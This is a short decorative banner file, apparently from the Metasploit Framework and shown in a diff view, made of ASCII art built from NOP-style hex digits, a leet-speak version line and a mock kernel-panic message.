|
||||
90909090.90909090.90909090
|
||||
90909090.90909090.09090900
|
||||
90909090.90909090.09090900
|
||||
..........................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
ccccccccc.................
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
.................ccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
cccccccccccccccccccccccccc
|
||||
..........................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffffffffffffffffffffff
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
ffffffff..................
|
||||
%clr
|
||||
|
||||
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
|
||||
Aiee, Killing Interrupt handler
|
||||
%redKernel panic: Attempted to kill the idle task!
|
||||
In swapper task - not syncing%clr
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue